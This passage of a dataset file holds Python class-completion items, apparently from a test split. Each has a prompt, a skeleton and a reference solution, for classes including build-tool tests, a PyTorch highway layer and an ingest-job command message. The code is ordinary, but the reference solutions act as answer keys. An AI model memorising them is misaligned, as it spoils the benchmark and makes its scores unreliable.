\"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n <|body_0|>\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n <|body_1|>\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n <|body_2|>\n\n def test_with_3(self):\n \"\"\"Same, mixing out. 
and outputs.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n<|end_body_2|>\n\n<|body_start_3|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000291", "length_bytes": 1966, "license_type": "permissive", "methods": [{"docstring": "Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:", "name": "test_without", "signature": "def test_without(self)"}, {"docstring": "With the outputs attribute, the recipe is run only once:", "name": "test_with", "signature": "def test_with(self)"}, {"docstring": "Same, but using the out. prefix instead of the outputs attribute.", "name": "test_with_2", "signature": "def test_with_2(self)"}, {"docstring": "Same, mixing out. and outputs.", "name": "test_with_3", "signature": "def test_with_3(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006142", "prompt": "Implement the Python class `MultipleOutputsTest` described below.\n\nClass description:\nTests the handling of recipes with multiple outputs.\n\nMethod signatures and docstrings:\n- def test_without(self): Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\n- def test_with(self): With the outputs attribute, the recipe is run only once:\n- def test_with_2(self): Same, but using the out. prefix instead of the outputs attribute.\n- def test_with_3(self): Same, mixing out. and outputs.", "prompted_full_text": "Implement the Python class `MultipleOutputsTest` described below.\n\nClass description:\nTests the handling of recipes with multiple outputs.\n\nMethod signatures and docstrings:\n- def test_without(self): Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\n- def test_with(self): With the outputs attribute, the recipe is run only once:\n- def test_with_2(self): Same, but using the out. prefix instead of the outputs attribute.\n- def test_with_3(self): Same, mixing out. 
and outputs.\n\n<|skeleton|>\nclass MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n <|body_0|>\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n <|body_1|>\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n <|body_2|>\n\n def test_with_3(self):\n \"\"\"Same, mixing out. and outputs.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n<|end_body_2|>\n\n<|body_start_3|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n<|end_body_3|>\n", "revision_id": "fe4116d063b8820877b9f589e40cae29721511bf", "skeleton": "<|skeleton|>\nclass MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n <|body_0|>\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n <|body_1|>\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n <|body_2|>\n\n def test_with_3(self):\n \"\"\"Same, mixing out. 
and outputs.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n\n def test_with_3(self):\n \"\"\"Same, mixing out. and outputs.\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n", "source": "the_stack_v2_python_sparse", "source_path": "t/test_multiple_outputs.py", "source_repo": "texttheater/produce", "split": "test", "star_events_count": 14} {"blob_id": "0d2788a3d6283dcb7879f0d7cac3aee0add23639", "bodies": ["super(Highway, self).__init__()\nself.embedded_char_size = embedded_char_size\nself.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\nself.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\nself.relu = nn.ReLU()\nself.sigmoid = nn.Sigmoid()", "assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\nx_proj = self.relu(self.proj_projection(x_conv_out))\nassert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\nx_gate = self.sigmoid(self.gate_projection(x_conv_out))\nassert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\nx_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\nassert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\nreturn x_highway"], "bodies_text": "<|body_start_0|>\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n<|end_body_0|>\n\n<|body_start_1|>\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == 
x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n<|end_body_1|>\n", "class_docstring": "HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input", "class_name": "Highway", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n <|body_0|>\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n<|end_body_0|>\n\n<|body_start_1|>\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000292", "length_bytes": 2058, "license_type": "no_license", "methods": [{"docstring": "Init HighWay Instance. @param embedded_char_size: int", "name": "__init__", "signature": "def __init__(self, embedded_char_size)"}, {"docstring": "Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)", "name": "forward", "signature": "def forward(self, x_conv_out)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001337", "prompt": "Implement the Python class `Highway` described below.\n\nClass description:\nHighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\n\nMethod signatures and docstrings:\n- def __init__(self, embedded_char_size): Init HighWay Instance. 
@param embedded_char_size: int\n- def forward(self, x_conv_out): Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)", "prompted_full_text": "Implement the Python class `Highway` described below.\n\nClass description:\nHighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\n\nMethod signatures and docstrings:\n- def __init__(self, embedded_char_size): Init HighWay Instance. @param embedded_char_size: int\n- def forward(self, x_conv_out): Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\n\n<|skeleton|>\nclass Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n <|body_0|>\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n<|end_body_0|>\n\n<|body_start_1|>\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n<|end_body_1|>\n", "revision_id": "a883935d779dca3a3cc443c3fa6d6a455f21e87a", "skeleton": "<|skeleton|>\nclass Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n <|body_0|>\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. 
@param embedded_char_size: int\"\"\"\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n", "source": "the_stack_v2_python_sparse", "source_path": "stanford_nlp/a5/highway.py", "source_repo": "guocongyun/ml-projects", "split": "test", "star_events_count": 0} {"blob_id": "032cef86e10c43d8b85dd26658516506164c5ffb", "bodies": ["super(CreateIngest, self).__init__('create_ingest_jobs')\nself.create_ingest_type = None\nself.ingest_id = None\nself.scan_id = None\nself.strike_id = None", "json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\nif self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\nelif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\nreturn json_dict", "message = CreateIngest()\nmessage.create_ingest_type = json_dict['create_ingest_type']\nmessage.ingest_id = json_dict['ingest_id']\nif message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\nelif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\nreturn message", "from ingest.models import Ingest\ningest_job_type = Ingest.objects.get_ingest_job_type()\ningest = Ingest.objects.get(pk=self.ingest_id)\nwhen = ingest.transfer_ended if ingest.transfer_ended else now()\ndesc = {'file_name': ingest.file_name}\nevent = None\ningest_id = ingest.id\nwith transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\ndata = Data()\ndata.add_value(JsonValue('ingest_id', ingest_id))\ndata.add_value(JsonValue('workspace', ingest.workspace.name))\nif ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\ningest_job = None\nwith transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\njob = Job.objects.get_details(ingest_job.id)\nself.new_messages.extend(create_process_job_input_messages([job.id]))\nreturn True"], "bodies_text": 
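A note on the `Highway` record that ends above: its asserts use `assert cond, print(f'...')`, which prints eagerly and attaches print's `None` return value as the assertion message, and the skeleton's bare `class Highway:` cannot actually run `super(Highway, self).__init__()` with registered `nn.Linear` parameters unless it subclasses `nn.Module`. A minimal runnable restatement, assuming standard PyTorch and keeping the record's names:

# Runnable restatement of the Highway record, assuming PyTorch. Two fixes
# relative to the stored bodies:
#   (1) subclass nn.Module, which super(Highway, self).__init__() implies
#       and which nn.Linear parameter registration requires;
#   (2) plain f-strings as assert messages, instead of print(...) calls.
import torch
import torch.nn as nn

class Highway(nn.Module):
    def __init__(self, embedded_char_size):
        super().__init__()
        self.embedded_char_size = embedded_char_size
        self.proj_projection = nn.Linear(embedded_char_size, embedded_char_size)
        self.gate_projection = nn.Linear(embedded_char_size, embedded_char_size)
        self.relu = nn.ReLU()
        self.sigmoid = nn.Sigmoid()

    def forward(self, x_conv_out):
        # highway: out = g * relu(W_p x) + (1 - g) * x, with g = sigmoid(W_g x)
        assert x_conv_out.size(-1) == self.embedded_char_size, \
            f'{x_conv_out.size()} conv_out size'
        x_proj = self.relu(self.proj_projection(x_conv_out))
        x_gate = self.sigmoid(self.gate_projection(x_conv_out))
        return x_gate * x_proj + (1 - x_gate) * x_conv_out

# Smoke test: output shape matches input shape.
assert Highway(4)(torch.randn(8, 4)).shape == (8, 4)

The record's docstring gives the input shape as (max_sentence_length * batch_size, embedded_char_size, max_word_length), yet the same-shape asserts imply input and output agree; in the usual character-CNN setup this suggests the layer is applied after max-pooling over word length, so the input is effectively (max_sentence_length * batch_size, embedded_char_size).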
"<|body_start_0|>\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = None\n self.strike_id = None\n<|end_body_0|>\n\n<|body_start_1|>\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n<|end_body_1|>\n\n<|body_start_2|>\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n<|end_body_2|>\n\n<|body_start_3|>\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n<|end_body_3|>\n", "class_docstring": "Command message that creates the ingest job", "class_name": "CreateIngest", "detected_licenses": ["LicenseRef-scancode-free-unknown", "Apache-2.0", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n <|body_1|>\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n <|body_2|>\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = None\n self.strike_id = None\n<|end_body_0|>\n\n<|body_start_1|>\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return 
json_dict\n<|end_body_1|>\n\n<|body_start_2|>\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n<|end_body_2|>\n\n<|body_start_3|>\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000293", "length_bytes": 5186, "license_type": "permissive", "methods": [{"docstring": "Constructor", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "See :meth:`messaging.messages.message.CommandMessage.to_json`", "name": "to_json", "signature": "def to_json(self)"}, {"docstring": "See :meth:`messaging.messages.message.CommandMessage.from_json`", "name": "from_json", "signature": "def from_json(json_dict)"}, {"docstring": "See :meth:`messaging.messages.message.CommandMessage.execute`", "name": "execute", "signature": "def execute(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006326", "prompt": "Implement the Python class `CreateIngest` described below.\n\nClass description:\nCommand message that creates the ingest job\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor\n- def to_json(self): See :meth:`messaging.messages.message.CommandMessage.to_json`\n- def from_json(json_dict): See :meth:`messaging.messages.message.CommandMessage.from_json`\n- def execute(self): See :meth:`messaging.messages.message.CommandMessage.execute`", "prompted_full_text": "Implement the Python class `CreateIngest` described below.\n\nClass description:\nCommand message that creates the ingest job\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor\n- def to_json(self): See :meth:`messaging.messages.message.CommandMessage.to_json`\n- def from_json(json_dict): See :meth:`messaging.messages.message.CommandMessage.from_json`\n- def execute(self): See :meth:`messaging.messages.message.CommandMessage.execute`\n\n<|skeleton|>\nclass CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def 
to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n <|body_1|>\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n <|body_2|>\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = None\n self.strike_id = None\n<|end_body_0|>\n\n<|body_start_1|>\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n<|end_body_1|>\n\n<|body_start_2|>\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n<|end_body_2|>\n\n<|body_start_3|>\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n<|end_body_3|>\n", "revision_id": "28618aee07ceed9e4a6eb7b8d0e6f05b31d8fd6b", "skeleton": "<|skeleton|>\nclass CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def 